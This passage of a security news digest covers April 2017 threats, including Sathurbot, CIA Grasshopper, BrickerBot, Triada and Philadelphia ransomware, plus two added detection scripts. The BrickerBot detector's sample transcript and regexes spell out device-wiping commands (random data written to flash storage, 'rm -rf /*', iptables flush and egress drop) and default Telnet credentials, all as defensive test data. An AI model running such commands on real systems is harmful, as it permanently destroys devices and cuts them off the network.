“From the perspective of the user and of prevention, it is important to be cautious and not open every attachment, especially if the sender or the e-mail itself seems suspicious to you. The fact that Danger has stayed in the spotlight in the Czech Republic for so long shows that it is effective malware with which attackers are still able to find enough victims,” said Miroslav Dvořák, technical director at Eset.
Danger is not the only threat
The second most frequently detected malware in March, Nemucod, is also a downloader. “Its share almost doubled month on month compared with the February figure, reaching nearly nine percent,” Dvořák stated.
“A new entrant in the overview of the ten most common internet threats is the Trojan horse Java/QRat. It is a variant of a Remote Access Trojan for Java. Attackers use it as a backdoor for remote access to the system of the infected device, usually to exfiltrate sensitive data,” Dvořák concluded.
The list of the ten most widespread threats for March can be found in the table below:
Top 10 threats in the Czech Republic for March 2017:
1. JS/Danger.ScriptAttachment (25,90 %)
2. JS/TrojanDownloader.Nemucod (8,84 %)
3. Java/GRat (5,48 %)
4. Win32/Adware.ELEX (4,60 %)
5. JS/Chromex.Submeliux (2,39 %)
6. Win32/Deceptor.AdvancedSystemCare (1,72 %)
7. Java/Adwind (1,59 %)
8. Win32/Packed.VMProtect.ABO (1,57 %)
9. Win32/Obfuscated.NIT (1,53 %)
10. Win32/Packed.VMProtect.AAA (1,43 %)
Source: Eset
According to IBM X-Force, 2016 saw the largest amount of leaked data in history
8.4.2017 SecurityWorld Crime
The IBM Security division has published the results of the IBM X-Force Threat Intelligence Index for 2016. The amount of leaked data rose from 600 million to more than 4 billion records, a historic increase of 566 %.
Besides the traditional targets of cybercriminals, such as credit cards, passwords and information on victims' health, the IBM X-Force team recorded a significant shift in attackers' strategy. In 2016, a number of major leaks involved unstructured data such as e-mail archives, business documents, intellectual property or source code.
The IBM X-Force Threat Intelligence Index is based on observations from more than 8,000 monitored clients with an installed security solution in a hundred countries, and on data obtained from devices such as spam detectors or honeynets (systems that deliberately attract potential attackers and track their activity). IBM X-Force operates network traps around the world and monitors more than eight million spam and phishing attacks daily. It also analyses over 37 billion web pages and images.
In another study last year, IBM Security found that 70 % of companies hit by ransomware paid more than 10,000 dollars in exchange for regaining access to company data and systems. According to FBI estimates, cybercriminals using ransomware were paid 209 million dollars in the first three months of 2016. At that rate, cybercriminals could have earned almost a billion dollars from the malware in the past year alone.
The prospect of profit and companies' growing willingness to pay emboldened cybercriminals last year to carry out twice as many ransomware attacks. The simplest way to deliver ransomware to a victim's computer is through attachments in spam e-mail messages. Last year the volume of spam rose by 400 % year on year, with roughly 44 % of spam containing malicious attachments. In 2016, ransomware was present in 85 % of these malicious attachments.
In 2015, healthcare organizations were under the heaviest attack, with financial services in third place. In 2016, however, criminals again focused primarily on finance. That sector thus holds the unenviable first place in the number of attacks targeting it.
Data from the X-Force report, however, show that in terms of the number of records actually leaked, finance is in third place. The lower success rate of attacks in the financial sector shows that continuous investment in security measures is largely effective.
Despite a persistently high number of incidents, far less data leaked from the healthcare sector, because attackers focused on smaller targets. In 2016, “only” 12 million records leaked in healthcare, which puts it outside the five most affected industries. For comparison, almost 100 million healthcare records leaked in 2015; the 2016 figure is thus 88 % lower. Last year, the highest number of incidents and leaked records was recorded by companies providing information and communication services and by government agencies.
Sathurbot botnet, over 20,000 bots launched a distributed WordPress password attack
8.4.2017 securityaffairs BotNet
Experts observed a new threat targeting WordPress installs: the Sathurbot botnet attempts to brute-force WordPress accounts.
Once it has compromised a WordPress website, the Sathurbot botnet uses it to spread the malware.
Sathurbot leverages torrents as a delivery mechanism: once a website is compromised, it is used to host fake movie and software torrents. When victims search for a movie or software to download, they receive malicious links instead of legitimate torrents.
Users are served movie and software torrents that both contain an executable which, once launched, is tasked with loading the Sathurbot DLL.
“The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file,” reads the analysis published by ESET. “The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice the victim to run the executable which loads the Sathurbot DLL.”
Once executed, the Sathurbot Trojan notifies the victims that their machine has become a bot in the Sathurbot botnet.
“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.” states ESET.
Once installed, the malware reports its successful installation and a listening port to the C&C server. It then contacts the C&C periodically while waiting for additional instructions.
The Sathurbot botnet also implements black-hat SEO techniques to make the malicious links available through the major search engines.
“Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.” continues ESET.
“From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.”
According to the experts, operators of the botnet are also interested in targeting websites running other CMSs such as Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks.
The bot sends the harvested domains to the C&C and receives back a list of credentials formatted as login:password@domain. These credentials are used to gain access to the websites; the operators implemented a distributed WordPress password attack in which different bots try different login credentials for the same site. The tactic allows the attackers to avoid being blocked: each bot tries only a single login per site and then moves on to the next domain.
“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET adds.
The bot integrates the libtorrent library to act as a torrent seeder: a binary file is downloaded and a torrent is created for it.
The experts noticed that not all bots in the network perform all of the above functions: some only work as web crawlers, others are used to brute-force the websites, and not all bots act as seeders.
“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.” concludes ESET.
Experts believe the Sathurbot botnet has been active since at least June 2016.
“Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.”
WikiLeaks Reveals CIA's Grasshopper Windows Hacking Framework
8.4.2017 thehackernews BigBrothers
WikiLeaks reveals 'Grasshopper Framework' that CIA used to build Customized Windows Malware
As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonging to the US Central Intelligence Agency (CIA).
Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft's Windows operating systems and bypassing antivirus protection.
All the leaked documents are essentially a user manual that the agency flagged as "secret" and that was supposed to be accessed only by members of the agency, WikiLeaks claims.
Grasshopper: Customized Malware Builder Framework
According to the leaked documents, the Grasshopper framework allows agency members to easily create custom malware, depending on technical details such as which operating system and antivirus the targets are using.
The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.
"A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."
The whistleblowing website claimed the Grasshopper toolset was allegedly designed to go undetected even by the anti-virus products of the world's leading vendors, including Kaspersky Lab, Symantec, and Microsoft.
CIA's Grasshopper Uses 'Stolen' Russian Malware
According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."
"Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.
One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.
One such malware is "Carberp," a rootkit developed by Russian hackers.
"The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."
It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."
Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
BrickerBot Damages IoT Device Firmware
8.4.2017 securityweek IoT
Security researchers have identified a new type of cyber attack that causes damage to Internet of Things (IoT) devices, rather than ensnaring them into a botnet.
Dubbed Permanent Denial-of-Service (PDoS), the attacks can be highly damaging, resulting in the need to replace or reinstall hardware, researchers explain: security flaws are abused to destroy the firmware and/or basic functions of the system.
One of the tools used to launch such attacks is called BrickerBot, and Radware researchers observed two variants starting March 20, 2017. One of them, however, had a short life and is now inactive, while the other continues to operate. Both have had the same purpose: to compromise IoT devices and corrupt their storage.
Both bots started PDoS attempts on the same date and they were discovered within one hour of each other. However, while the first showed intense activity over its short life, the second displayed lower intensity but has been more thorough in its attacks and has also been concealing its location using TOR (The Onion Router) egress nodes.
To compromise devices, BrickerBot uses Telnet brute force, a method previously associated with the Mirai botnet, which abused infected devices to launch distributed denial of service (DDoS) attacks.
Once it has successfully accessed a device, the PDoS bot performs a series of Linux commands meant to ultimately corrupt storage. Next, it also attempts to disrupt Internet connectivity and device performance, and to wipe all files on the device.
“Among the special devices targeted are /dev/mtd (Memory Technology Device - a special device type to match flash characteristics) and /dev/mmc (MultiMediaCard - a special device type that matches memory card standard, a solid-state storage medium),” Radware researchers reveal.
The attack is targeted specifically at Linux/BusyBox-based IoT devices that have the Telnet port open and exposed publicly on the Internet. These are the same type of devices that Mirai and related IoT botnets have been targeting.
The recorded PDoS attempts originated from a limited number of IP addresses worldwide, with all devices exposing port 22 (SSH) and running an older version of the Dropbear SSH server. These were identified as Ubiquiti network devices.
The security researchers also identified a second type of PDoS attempts, with a different command signature, which hid their source IP addresses behind TOR nodes. Still ongoing, these attacks attempt to brute-force the Telnet login using the root/root and root/vizxv username-password pairs, use more thorough commands, and target a much broader range of storage devices.
These attacks don’t use 'busybox' but attempt both 'dd' and 'cat', whichever is available on the breached device, the researchers say. In the end, these attacks also attempt to remove the default gateway, wipe the devices, and disable TCP timestamps. With the help of extra commands, the attackers attempt to flush all iptables firewall and NAT rules and add a rule to drop all outgoing packets.
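Radware's last recommendation earlier on this page was to detect the described command sequences with a signature. The script below is an added example, not code from Radware or from either BrickerBot article: it scores Telnet honeypot session transcripts against indicator categories reconstructed from the behaviour the articles describe. The regexes, the transcript line format and the sample sessions are this example's own constructs.

```python
import re
from collections import defaultdict

# Indicator categories reconstructed from the behaviour the write-ups
# describe: storage corruption via dd/cat on /dev/mtd* or /dev/mmc* and
# 'rm -rf /*', disabled TCP timestamps, a one-thread kernel limit, flushed
# iptables/NAT rules, dropped egress and a removed default gateway.
# The regexes are this example's own approximation, not a vendor signature.
INDICATORS = {
    "storage_wipe": re.compile(r"\b(dd|cat)\b.*/dev/(mtd|mmc)|\brm\s+-rf\s+/\*"),
    "tcp_timestamps": re.compile(r"net\.ipv4\.tcp_timestamps\s*=\s*0"),
    "thread_limit": re.compile(r"kernel\.threads-max\s*=\s*1\b"),
    "fw_flush": re.compile(r"\biptables\s+(-t\s+nat\s+)?-F\b"),
    "drop_egress": re.compile(r"\biptables\s+-A\s+OUTPUT\s+-j\s+DROP\b"),
    "gateway_removal": re.compile(r"\broute\s+del\s+default\b"),
}

# Credential pairs the articles report the bots trying first.
DEFAULT_CREDS = {("root", "root"), ("root", "vizxv")}


def parse_line(line):
    """Parse one transcript line of the constructed honeypot format
    '<timestamp> <session> LOGIN <user> <password>' or
    '<timestamp> <session> CMD <command text>'.
    Returns (session, kind, payload) or None for lines that do not match."""
    parts = line.rstrip("\n").split(maxsplit=3)
    if len(parts) < 4 or parts[2] not in ("LOGIN", "CMD"):
        return None
    return parts[1], parts[2], parts[3]


def classify_command(cmd):
    """Return the set of indicator categories that a single command matches."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmd)}


def analyse_sessions(lines, min_categories=2):
    """Group transcript lines by session and return {session: [categories]}
    for sessions that look like a PDoS attempt: either at least
    min_categories distinct indicator categories, or a storage-wipe command
    following a login with a known default credential pair."""
    hits = defaultdict(set)
    default_cred_sessions = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        sid, kind, payload = parsed
        if kind == "LOGIN":
            creds = tuple(payload.split(maxsplit=1))
            if creds in DEFAULT_CREDS:
                default_cred_sessions.add(sid)
        else:
            hits[sid] |= classify_command(payload)

    alerts = {}
    for sid, cats in hits.items():
        # A lone 'iptables -F' typed by an administrator stays below the
        # threshold; a wipe right after a default-credential login does not.
        if len(cats) >= min_categories or (
            "storage_wipe" in cats and sid in default_cred_sessions
        ):
            alerts[sid] = sorted(cats)
    return alerts


# Constructed transcript: s1 and s3 mimic the described command sequences,
# s2 is an administrator legitimately reworking the firewall.
SAMPLE_TRANSCRIPT = """\
2017-03-20T14:02:11Z s1 LOGIN root vizxv
2017-03-20T14:02:12Z s1 CMD busybox cat /dev/urandom >/dev/mtd0
2017-03-20T14:02:13Z s1 CMD busybox rm -rf /*
2017-03-20T14:02:14Z s1 CMD sysctl -w net.ipv4.tcp_timestamps=0
2017-03-20T14:02:14Z s1 CMD sysctl -w kernel.threads-max=1
2017-03-20T14:02:15Z s1 CMD iptables -F; iptables -t nat -F; iptables -A OUTPUT -j DROP
2017-03-20T14:05:00Z s2 LOGIN admin Str0ngPass!
2017-03-20T14:05:05Z s2 CMD iptables -F
2017-03-20T14:05:09Z s2 CMD iptables -A INPUT -p tcp --dport 23 -j DROP
2017-03-20T14:07:30Z s3 LOGIN root root
2017-03-20T14:07:31Z s3 CMD dd if=/dev/urandom of=/dev/mmcblk0 bs=1M
2017-03-20T14:07:32Z s3 CMD route del default
"""

if __name__ == "__main__":
    for sid, cats in analyse_sessions(SAMPLE_TRANSCRIPT.splitlines()).items():
        print(f"{sid}: PDoS indicators {', '.join(cats)}")
```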
WikiLeaks leaked files on the Grasshopper framework, a CIA Tool for creating customized malware installers
8.4.2017 securityaffairs BigBrothers
WikiLeaks published a new batch of 27 documents detailing the Grasshopper framework used by CIA agents to create custom installers for Windows malware.
WikiLeaks continues to disclose documents included in the CIA Vault 7 archive; on Friday it published a new batch of 27 documents detailing a framework, dubbed Grasshopper, allegedly used to create custom installers for Windows malware.
The Grasshopper framework allows CIA operators to build a custom payload, run it and analyze the results of the execution.
The leaked documents compose a user guide classified as “secret” that was available to the CIA cyber spies.
“The documents WikiLeaks publishes today provide insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.
According to the Grasshopper manual, the dropper should be loaded and executed only in memory. The framework allows creating custom malware that is able to compromise the target system while bypassing the antivirus it is using.
“A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components,” reads the manual. “Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload.”
Each executable generated with the Grasshopper framework contains one or more installers.
The framework offers operators various persistence mechanisms and lets them define a series of rules that must be met before an installation is launched. The rules allow attackers to target specific systems by specifying their technical details (i.e. 32- or 64-bit architecture, OS).
“An executable may have a global rule that will be evaluated before execution of any installers. If a global rule is provided and evaluates to false the executable aborts operation” continues the manual.
One of the persistence mechanisms reported in the user guide is called Stolen Goods; basically, the CIA reused mechanisms implemented by malicious code that crooks use in the wild.
For example, the CIA has modified some components of the popular Carberp rootkit.
“The persistence method and parts of the installer were taken and modified to fit our needs,” reads a leaked document. “A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified.”
Another persistence mechanism leverages the Windows Update Service to execute the payload on every system boot or every 22 hours; this technique uses a series of DLLs specified in the registry.
WikiLeaks has already leaked the “Year Zero” batch which contains detailed info on the CIA hacking exploits and the “Dark Matter” batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs. A few days ago, WikiLeaks published the third batch called “Marble,” a collection of files describing the CIA anti-forensics tool dubbed Marble framework.
Sathurbot Botnet Targets WordPress Accounts
8.4.2017 securityweek BotNet
A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.
Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.
Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.
Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.
“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.
The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.
Sathurbot comes with some 5,000 plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results, and uses it for the next round of search queries. The second set of search results is used to harvest domain names.
The threat selects only the domains that were created using WordPress, but it appears to also be interested in the Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks. The malware sends the harvested domains to the C&C.
The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.
“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.
The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.
“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.
Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.
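For the log symptoms ESET describes in both Sathurbot write-ups on this page (many clients each trying /wp-login.php or the XML-RPC endpoint once, even on sites that do not run WordPress), here is an added example detector; it is not ESET's code. It walks combined-format web access log lines and flags bursts of single-attempt clients; the thresholds, the time window and the sample log lines are this example's own constructs.

```python
import re
from collections import Counter, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Endpoints the articles name: the login form and the XML-RPC API
# (wp.getUsersBlogs travels in the POST body, so only the path is visible here).
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_distributed_logins(lines, window=timedelta(minutes=10),
                              min_ips=5, max_per_ip=1):
    """Flag bursts in which at least min_ips distinct clients each POST to a
    login endpoint no more than max_per_ip times inside `window`. A single
    client retrying its password (the classic brute-force signature) is
    ignored; many clients trying once each is the Sathurbot pattern."""
    events = [e for e in map(parse_line, lines)
              if e and e["method"] == "POST" and e["path"] in LOGIN_PATHS]
    events.sort(key=lambda e: e["ts"])
    recent = deque()
    alerts = []
    for e in events:
        recent.append(e)
        while e["ts"] - recent[0]["ts"] > window:
            recent.popleft()
        per_ip = Counter(x["ip"] for x in recent)
        single_shot = [ip for ip, n in per_ip.items() if n <= max_per_ip]
        if len(single_shot) < min_ips:
            continue
        alert = {
            "first_seen": recent[0]["ts"],
            "last_seen": e["ts"],
            "single_shot_ips": len(single_shot),
            "total_attempts": len(recent),
            # 404s on the login path mean the site is not WordPress at all,
            # the collateral hits the articles say puzzle many web admins.
            "non_wordpress_target": all(x["status"] == 404 for x in recent),
        }
        if alerts and alert["first_seen"] <= alerts[-1]["last_seen"]:
            alerts[-1] = alert      # same burst, keep the latest snapshot
        else:
            alerts.append(alert)
    return alerts


# Constructed log: 198.51.100.7 is a real user retrying a password; the five
# other clients each try exactly once, the way different bots split one site.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Apr/2017:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3241 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Apr/2017:10:00:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.11 - - [08/Apr/2017:10:02:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3241 "-" "Mozilla/5.0"
203.0.113.57 - - [08/Apr/2017:10:03:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3241 "-" "Mozilla/5.0"
203.0.113.102 - - [08/Apr/2017:10:04:15 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.8 - - [08/Apr/2017:10:05:59 +0000] "POST /wp-login.php HTTP/1.1" 200 3241 "-" "Mozilla/5.0"
192.0.2.77 - - [08/Apr/2017:10:07:30 +0000] "POST /wp-login.php HTTP/1.1" 200 3241 "-" "Mozilla/5.0"
203.0.113.200 - - [08/Apr/2017:10:08:12 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for a in detect_distributed_logins(SAMPLE_LOG.splitlines()):
        print(f"{a['single_shot_ips']} single-attempt clients, "
              f"{a['total_attempts']} login POSTs between "
              f"{a['first_seen']} and {a['last_seen']}")
```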
WikiLeaks Details CIA Tool for Creating Windows Malware Installers
8.4.2017 securityweek BigBrothers
WikiLeaks leaks more alleged CIA hacking tools
WikiLeaks on Friday published 27 documents detailing a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to create custom installers for malware designed to target Windows systems.
The framework, dubbed “Grasshopper,” has been described as a tool that allows operators to build a custom installation executable, run that executable, and evaluate the results of the execution. The Grasshopper user guide specifies that the dropper should be loaded and executed only in memory.
Leaked documents show that Grasshopper provides various persistence mechanisms and allows users to define a series of conditions that need to be met before an installation is launched. These rules can help determine if the targeted device is running the correct version of Windows and if certain security products are present.
One of the persistence mechanisms highlighted by WikiLeaks involves the Windows Update Service, which can be abused to ensure that the payload is executed on every system boot or every 22 hours, when the service loads a series of DLLs specified in the registry.
WikiLeaks also highlighted Stolen Goods, a Grasshopper persistence module that borrows code from the notorious Carberp banking Trojan, whose source code was leaked a few years ago. The authors of Stolen Goods, however, pointed out that only some parts of the Carberp code were taken and those were heavily modified.
“The documents WikiLeaks publishes today provide insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.
This is the third round of files made public by WikiLeaks as part of the dump called Vault 7. The organization claims to possess numerous exploits allegedly used by the CIA and it has offered to share them with affected tech companies, but it appears that many firms are not willing to comply with WikiLeaks’ demands to obtain the information.
An analysis of the information made public to date has shown that many of the vulnerabilities have already been patched by security firms and tech giants such as Apple and Google. Cisco did admit finding a critical vulnerability affecting many of its switches following an analysis of the Vault 7 files.
Android Trojan Uses Sandbox to Evade Detection
8.4.2017 securityweek Android
The Triada malware, said last year to be the most advanced mobile threat, recently boosted its detection evasion capabilities with the adoption of sandbox technology, Avast security researchers reveal.
Detailed for the first time in March last year, the malware was observed leveraging the Zygote process to hook all applications on a device. Featuring a modular architecture, the Trojan was mainly designed to redirect financial SMS transactions to buy additional content or steal money from the user.
Recently, Triada started using the open source sandbox DroidPlugin, which is designed to dynamically load and run an app without actually installing it. With the help of this sandbox, Triada loads malicious APK plugins, running them without having to install them on the device. Because of this practice, anti-virus solutions have a hard time detecting the malware, as its malicious components are not stored in the host app.
The malware is being distributed with the help of social engineering tactics, by deceiving victims into downloading the malware. Once installed, the threat hides its icon from the phone’s desktop and starts stealing personal information in the background, without ever alerting the victim.
While the earliest variant of the malware didn’t use DroidPlugin, a new variant that emerged in November started integrating it, Avast researchers explain. Around the same time the new Triada variant emerged, the malware author reportedly submitted an issue to DroidPlugin to report an out-of-memory bug.
According to Avast, the malware disguises itself as Wandoujia, a famous Android app store in China. Furthermore, it was observed hiding all of its malicious APK plugins in the asset directory, for DroidPlugin to run.
“Each of these plugins has its own dedicated malicious action to spy on the victim, including file stealing, radio monitoring, and more. One of the plugins communicates with a remote command and control (C&C) server, which instructs which activities should be carried out. These are then carried out by the other APKs,” the researchers say.
Avast also explains that the malware developer didn’t integrate the malicious plugins into an application, but instead opted to use the DroidPlugin sandbox to dynamically load and run them, specifically to bypass antivirus detection. The host application doesn’t include malicious actions, so antivirus solutions won’t detect and block the host app.
Only a couple of cases of malware using sandboxes for their nefarious purposes have been observed so far, but more instances might emerge. “While it can be convenient to use a sandbox to run an app without installing it, sandboxes can also be used maliciously by malware,” Avast concludes.
Joke "rensenWare" Ransomware Challenges Gamers
8.4.2017 securityweek Virus
Researchers have discovered a strange new ransomware called 'rensenWare'. Rather than demanding money for decryption, it requires the victim to score "over 0.2 billion" playing "TH12 -- Undefined Fantastic Object". Victims are told that the score will be monitored, and decryption will be automatic on success, provided there is no attempt to cheat.
Analysis by Lawrence Abrams subsequently concluded that rensenWare is not effectively coded for it to be serious ransomware. "As the developer is not looking to generate revenue from this ransomware," he concluded, "this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed."
This seems to have been confirmed by the author, Tvple Eraser on Twitter: "Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day". rensenWare seems to have been a bit of fun by a gamer/hacker, and that's all.
That seems to be the feeling of the security industry. "Never say never, but I don't think we'll see much copycat efforts spawning from rensenware," Sean Sullivan, Security Advisor at F-Secure told SecurityWeek. Nevertheless, he added, "There was some interesting 'Kirk' ransomware the other week (and Spock was the cure). So I think we'll see continued amounts of 'creative' themes, but they'll be asking for Bitcoin, not high scores."
But hard-core gaming has its own sub-culture. SecurityWeek approached two hard-cores. One responded, "Oh, yes, most definitely this will provoke some copycat jokes and viruses." This is worth watching, because 'vendettas' among gamers are not unknown.
The other added, "In retrospect, I'm surprised no-one has done a ransomware like this already." He added that there's not much 'buzz' on the gaming scene yet, possibly because it's so new; but continued "I'd say there's a reasonable chance of it sparking a new 'subgenre' of ransomware viruses (challengeware?) and I can even see a toned-down version of it being used in viral marketing campaigns."
Right now, the basic concept developed by Tvple Eraser is not a threat -- but it has the potential to become one, or at least a nuisance. In fact, it could already be described as a nuisance. Googling 'rensenware' will generate a string of websites providing information on a threat that arguably does not exist, but all offering to remove it (and other ransomware/viruses) with a simple download.
That download is invariably SpyHunter. SpyHunter used to be thought of as 'rogueware'. It has fought this description vigorously, including in the courts. It has sued both BleepingComputer after a poor review, and Malwarebytes for classifying it as a PUP (potentially unwanted program). SecurityWeek asked Malwarebytes if it still treats SpyHunter as a PUP.
"Enigma's SpyHunter?" replied malware intelligence researcher Pieter Arntz; "Yes, definitely."
Vulnerability in Apple Music for Android could be exploited to steal user data
7.4.2017 securityaffairs Apple
Apple fixed a vulnerability tracked as CVE-2017-2387 in Apple Music for Android that could allow attackers to launch MitM attacks against the application.
The update released by Apple for the Apple Music application for Android fixes a certificate validation issue that can be exploited by an attacker to run MitM attacks and intercept user data.
Apple Music for Android version 2.0 also implements new features, in addition to fixing the vulnerability tracked as CVE-2017-2387.
According to Google Play, version 2.0 of Apple Music for Android has between 10 and 50 million installs.
The flaw CVE-2017-2387 was discovered by David Coomber of Info-Sec.CA in August 2016. The vulnerability affects Apple Music 1.2.1 and earlier versions of the Android app.
“The Apple Music Android application (version 1.2.1 and below), does not validate the SSL certificates it receives when connecting to the mobile application login and payment servers.” reads the security advisory published by Coomber.
“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently. Sensitive information could be captured by an attacker without the user’s knowledge.”
According to the expert, the app did not validate the SSL certificates presented while connecting to the login and payment servers. The attacker can present a forged SSL certificate that will be accepted by the application without raising any alert.
“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently,” Coomber explained in his advisory. “Sensitive information could be captured by an attacker without the user’s knowledge.”
Unfortunately, this kind of issue is quite common in mobile applications and represents a serious threat to user privacy.
Philadelphia Ransomware, a new threat targets the Healthcare Industry
7.4.2017 securityaffairs Virus
“Philadelphia” Ransomware Targets Healthcare Industry
Security experts from Forcepoint have discovered a new strain of ransomware dubbed Philadelphia that is targeting organizations in the healthcare industry.
The Philadelphia ransomware is a variant of the Stampado ransomware, a very cheap malware offered for sale on the Dark Web since June 2016 at just 39 USD for a lifetime license.
Last month the popular expert Brian Krebs discovered an ad for Philadelphia on YouTube.
According to the researchers, the Philadelphia ransomware is distributed via spear-phishing emails sent to hospitals. The messages contain a shortened URL that points to a personal storage site that serves a weaponized DOCX file containing the targeted healthcare organization’s logo.
The file includes three document icons apparently related to patient information, which attempt to trick victims into clicking on them.
If a victim clicks on one of the icons, JavaScript is triggered that downloads and executes a variant of the Philadelphia ransomware.
This tactic was already used to infect a hospital from Oregon and Southwest Washington.
“However, it appears that amateur cybercriminals have also started to shift towards this trend in the form of an off-the-shelf ransomware aimed at a healthcare organization in the United States.” reads the analysis published by ForcePoint.
“In this attack, a shortened URL, which we believe was sent through a spear-phishing email, was used as a lure to infect a hospital from Oregon and Southwest Washington. Once a user clicks on the link, the site redirects to a personal storage site to download a malicious DOCX file. This document contains the targeted healthcare organization’s logo and a signature of a medical practitioner from that organization as bait.”
“three document icons pertaining to patient information are present in the file. These icons all point to a malicious JavaScript” “Once the user double-clicks any of the icons, the Javascript is triggered which downloads and executes a variant of the Philadelphia ransomware.”
